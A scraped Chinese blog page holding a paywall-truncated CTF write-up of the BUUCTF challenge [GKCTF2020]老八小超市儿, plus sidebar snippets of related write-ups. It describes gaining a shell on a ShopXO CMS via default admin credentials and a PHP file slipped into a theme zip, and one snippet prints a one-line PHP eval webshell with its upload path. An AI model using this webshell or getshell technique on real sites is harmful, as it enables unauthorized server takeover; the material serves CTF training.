【学习笔记 21】 buu [GKCTF2020]老八小超市儿

最新推荐文章于 2022-02-13 16:11:04 发布
最新推荐文章于 2022-02-13 16:11:04 发布
阅读量539 收藏 1
点赞数 1
分类专栏: 网络安全 ctf 学习笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/106949100
版权

0x00 知识点

web安全渗透,后渗透提权

ps:想要看我之前的文章请点击如下链接
点我点我

00x1 解题思路

一看题目就是一道有味道的ctf题,打开一看发现是个(粉粉嫩的)网站在这里插入图片描述shopxocms的网站,百度搜索对应的网站漏洞,说是后台有地方可以利用压缩包getshell,尝试一下发现是admin.php就能打开对应的后台登录界面,并且知道了初始登录用户名admin,密码shopox,直接登录后台
在这里插入图片描述登陆进去后在应用中心->应用商店->主题的第一个默认主题,下载下来
在这里插入图片描述
用其中任意一个压缩包,用压缩软件打开(注意:这里一定不要解压就是单纯打开),并在default/_static添加一个a.php文件

最低0.47元/天 解锁文章
Noslpum
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GKCTF2020]老八小超市儿 -wp
freerats的博客
06-07 1233
这道题本就是基于shopxo已有的漏洞,解题思路也就基于此漏洞,若一开始对此漏洞无了解,那就比较难顶了 打开题目,就是一购物主页。 如果有了解shopxo,就知道默认后台就是admin.php, 登入的默认账号密码是admin和shopxo。 然后就进入到了网站后台 接下来就在应用中心里的应用商店找到主题,然后下载默认主题 因为后面应用主题的时候需要我们重新把下载的这个压缩包传上去,那我们就可以把一句话写入压缩包,给他一起传上去。 我们可以在_static_里面加上一个test.php,这里面就是我们加入
[GKCTF2020]老八小超市
末初的CSDN博客
06-17 933
题目地址 性感菜鸡在线搜索漏洞,找到一篇这个:渗透测试|shopxo后台全版本获取shell复现 后台管理地址:/admin.php?s=/admin/logininfo.html 默认账号密码登录即可:admin/shopxo 下载好主题之后,在这个位置添加我们的一句话马儿 然后把这个主题上传到网站进行安装 安装完成之后,选择这个主题,然后访问路径:/public/static/index/lengyu/shell.php 上蚁剑 /flag是假的,但是有线索,提示说真正的flag的在/ro
BUUCTF刷题记录 老八小超市
m0_46576074的博客
05-28 456
[GKCTF2020]老八小超市儿 进入网址 admin.php进入后台 账号admin 密码shopxo 应用中心——应用商城——主题 下载默认主题 编写一个a.php文件放进默认主题 a.php文件内容 <?php @eval($_POST[a]); phpinfo(); ?> 测试成功性 http://771c3e8f-4cea-4775-be69-fce5b8bd52f2.node3.buuoj.cn/public/static/index/default/a.ph
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
lfi-fuzz:用于枚举并尝试从LFI漏洞获取代码执行的python脚本
05-04
在使用此工具之前,您必须具有权限-该工具是为CTF使用而开发的,例如在TRYHACKME或HACKTHEBOX上! lfi-fuzz 用于枚举并尝试从LFI漏洞获取代码执行的python脚本 用法:lfi-fuzz.py [选项] 选项:-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE(OPTIONAL)指定您自己的文件以使用LFI搜索-默认情况下为/ etc / passwd,但是某些php过滤器将添加文件扩展名--filter = FILTER_STR(OPTIONAL)通常在以下位置出现的错误字符串尝试加载无效文件时的页面:“错误-找不到”。 注意-这是区分大小写的--custom-file-list = CUSTOM_LIST(OPTIO
buuctf-老八小超市
xixihahawuwu的博客
11-28 196
这题比较有点顶,如果知道这个漏洞的话就会非常方便。如果不知道的话就比较麻烦了 我们直接进入后台 成功进入后台,我们开始寻找注入点可以看到系统信息 源码中没有什么信息 我们在商店信息中看到可以上传图片,先试着上传一张图片看看 我们发现,含有一句话的图片并没有上传成功,而正常的图片上传成功 但是图片上传成功后没有任何回显 接着寻找 同样的情况,这里猜测所有上传图片文件的地方都有检测一个管理员列表再次在图片文件处尝试上传,再次失败。证实之前的猜测在网站管理的主题管理处我们发现了另一个上传处 这里我们会想到
GKCTF2020_web
ChenZIDu的博客
05-25 726
不完整,先把打出来的题目写一下,再写复现的好了 CheckIN 源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->cod
攻防世界ctf-misc-新手练习区-2
32bin的博客
06-03 380
攻防世界ctf-misc-新手练习区-2 这道题目真是不复杂,不要复杂化,简单化解决 先单击下载一下这个pdf文件 不用下载专业软件处理这个pdf 直接用firefox打开pdf 鼠标点进到打开的pdf 按住Ctrl+A全选,就会发现有个蓝色长方形 按住Ctrl+C复制 打开notepad++ Ctrl+V粘贴 得到flag flag{security_through_obscurity} ...
考核-re3
bygwys的博客
02-13 2090
做题思路:先查壳发现是64位的直接用ida打开后找到主函数中有一个rc4加密后,百度了解相关的内容后知道是一个给出原密(一开始以为负数不可以搞结果还是可以的)和密钥的一个加密,flag就是我们要的密文,然后我找了一个c语言写的rc4后进行修改就是脚本; 密钥:flag{this_is_fake_flag} 原密:就是v7数组 ...
CyBRICS-CTF————find_and_seek
菜鸡的博客
07-29 647
毛子的CTF,还真就如其名,得找到真正的逻辑所在。 最开始直接载入ida找到主函数,逻辑很简单,就是一大堆方程,用z3解就好了,但是这样得到的是fakeflag cybrics{HI_this_is_fake_flag} 尝试交,果然不对emmm 但是也能发现有不对的地方,比如程序调试的话还是会显示输入正确,但如果不调试输入这个就会报错 尝试attach上去 在ida里面先按照远程remote linux debug的方式配置,然后选择debugger->attach,在linux运行对应程序之后at
CTF的两道比较不错的流量分析题
热门推荐
晚安這個未知的世界
12-31 2万+
前言 前段时间,在一个群里面有两个人同时把两道流量分析题发出来,我做了一下感觉这两道题的质量很不错,所以就分享一下wp给大家,希望对大家有帮助。 Traffic.pcapng——一个10M的大小流量包 直接过滤http协议,可以看出这个流量包捕捉的是数据库注入流量 直接去分析一波,发现是用盲注的方式注入,由于本人盲注的技术太菜了,是菜鸡,所以请了一位大佬9u4ck给我一番的教程指导,我才弄懂,以下是大佬发我的教程: 直接把http协议里面的所有包都全复制到txt文件里面 然后我们过滤掉一下无用的,提取关
CTF_论剑场 misc杂项 WriteUp(持续更新)
qq_41995976的博客
05-19 9763
签到题 提交这里的flag即可 Snake 开始游戏要先注册 登录后发现是一个贪吃蛇游戏 并且题干里说要攒够500分就可获得flag 一开始思路是逆向工程 然后找flag 但是根据经验( 并且电脑里正好有CE 就使用CE来改分数了 但是发现改了分数之后的flag为乱码…… 于是又搞了一会儿 发现是长度的问题…… 于是把长度和分数一起修改: 成功获得了flag 之后的再做了之后更新 ...
云演CTF: 006.Lfi
wanguixiu的博客
06-09 551
云演CTF: 006.Lfi 作者: admin 时间: 2021-05-28 分类: 云演CTF 看名字就知道是local file include(本地文件包含),之前的笔记里有写过(打ctf时记的笔记(php))payload: ?file=php://filter/read=convert.base64-encode/resource...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值